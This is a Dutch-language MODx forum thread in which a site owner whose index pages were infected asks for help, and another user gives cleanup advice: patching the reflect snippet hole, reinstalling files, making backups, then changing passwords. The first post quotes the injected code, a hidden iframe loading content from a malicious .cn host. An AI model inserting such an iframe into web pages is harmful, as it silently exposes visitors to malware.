We launched new forums in March 2019—join us there. In a hurry for help with your website? Get Help Now!
    • 30382
    • 100 Posts
    Beste allen,

    Kwam er gisteren achter dat op een of andere manier stukken virus code op mijn index pagina’s toegevoegd waren.

    Het ging over code fragmenten zoals:

    <iframe src="http://technologybigtop.cn:8080/ts/in.cgi?pepsi14" width=12 height=12 style="visibility: hidden"></iframe>


    Ik ga nu alle wachtwoorden etc. aanpassen.

    Maar hoe kan ik het wachtwoord van MODx connectie met database aanpassen?

    Grt,
    Tony

      • 25483
      • 741 Posts
      Het aanpassen van je wachtwoorden zal niet veel helpen, zorg er eerst voor dat je lek dicht is en pas daarna je wachtwoorden aan.

      Een tijdje geleden is de "reflect" snippet bug gevonden, volgens mij was het het bestand reflect.snippet.php in de map assets/snippets/reflect/. Als deze er bij jou nog in staat moet je deze gelijk verwijderen! Het kan ook zijn dat je last hebt van een andere bug/lek, het beste is om je modx installatie te updaten naar de laatste versie.

      Daarna kan je via bijv. phpmyadmin het wachtwoord van je database veranderen.
        with regards,

        Ronald Lokers
        'Front-end developer' @ h2o Media

        • 30382
        • 100 Posts
        Mijn pc was zo goed als zeker besmet geraakt met een virus/trojan/worm.

        dit virus heeft FTP toegang weten te bemachtigen en zo alle domeinen weten te besmetten.
        Als ik het goed heb zijn de meeste index files op het domein besmet.

        Wat kan ik nu het beste doen?

        bv het index bestand is besmet.. ik kan deze echter niet openen en editen omdat mijn virusscanner deze tegen houdt.

        Kan ik op een of andere manier modx opnieuw installeren zodat alle oude index files etc. worden overgeschreven?

        Ik neem aan dat alle content gewoon in de database staat, toch?

        Wie kan me hiermee helpen.. het is echt heel erg dringend..

        alvast bedankt voor alle tips en hulp.
          • 25483
          • 741 Posts
          Weet je zeker dat alleen je index files besmet zijn? Als dat zo is kan je modx downloaden en simpelweg de index.php uploaden.

          De content staat in ieder geval in je database, maar je moet wel opletten met snippets/plugins/modules die je gebruikt hebt. Als je er een modx installatie overheen zet kan het zijn dat je de snippets/plugins/modules ook moet updaten.
            with regards,

            Ronald Lokers
            'Front-end developer' @ h2o Media

            • 30382
            • 100 Posts
            Nou... zeker weten doe ik het (nog niet)

            Ik heb echter bij alle drie de betrokken domeinen steekproefsgewijs gecheckt en kwam tot de conclusie dat bijna alle index files besmet waren .. (de besmetting an sich is trouwens van een zeer laag risico..)

            De index bestanden van de diverse submappen (bv manager/assets etc) zijn dus ook besmet.

            Hoe dien ik nu te werk gaan?

            Nieuwste modx versie downloaden.... en dan opnieuw uitpakken naar de server en daar alles laten overschrijven... of hoe moet ik het doen?

              • 25483
              • 741 Posts
              Je hebt 3 opties:

              - besmette bestanden openen en verdachte code eruit halen
              - modx downloaden, alleen index.php opnieuw uploaden
              - modx downloaden, alles uploaden en dan via de install een upgrade uitvoeren.

              Maak voor de zekerheid wel een backup van alles zodat je het niet erger kunt maken dan het nu is wink
                with regards,

                Ronald Lokers
                'Front-end developer' @ h2o Media

                • 30382
                • 100 Posts
                besmette bestanden openen en code verwijderen is eigenlijk geen optie... Want per domein heb ik een stuk of 30 a 40 index files.. en ik mag er absoluut geen enkele vergeten.

                dus alleen index.php opnieuw uploaden is ook geen oplossing.

                Ik heb net modx gedownload... Maar moet ik de inhoud van de map gewoon naar de root uploaden? (waar momenteel al modx geinstalleerd is?).. dan zal ik wel continu de vraag krijgen "bestand X bestaat al.. wil je overschrijven j/n? )

                dus gewoon overschrijven neem ik aan?

                Alle content/chunks/snippets etc zit dus in de database... die blijft gewoon staan...
                Op server/ftp niveau sla je eigenlijk alleen maar de bestanden/images op. toch?
                  • 25483
                  • 741 Posts
                  Inderdaad, op de server staan alleen je bestanden! content staat in de database, de meeste plugins/snippets/module heb ook bestanden op de server staan maar die blijven bij het opnieuw uploaden van modx gewoon staan.

                  Je kunt alles overschrijven, zolang je maar eerst een backup maakt van alle bestanden wink
                    with regards,

                    Ronald Lokers
                    'Front-end developer' @ h2o Media

                    • 30382
                    • 100 Posts
                    Thanks voor je hulp Ronald!

                    Ik ga hier eens uitgebreid aan de slag... ik zal je straks een update geven.
                      • 30382
                      • 100 Posts
                      nog 1 vraagje:

                      2 van de 3 domeinen gebruiken de meest recente modx versie.

                      1 domein gebruikt nog een oudere modx versie (van ongeveer 1 a 1,5 jaar geleden)...
                      Gaat dit problemen geven als ik de bestanden van een recentere modx versie upload naar dit domein?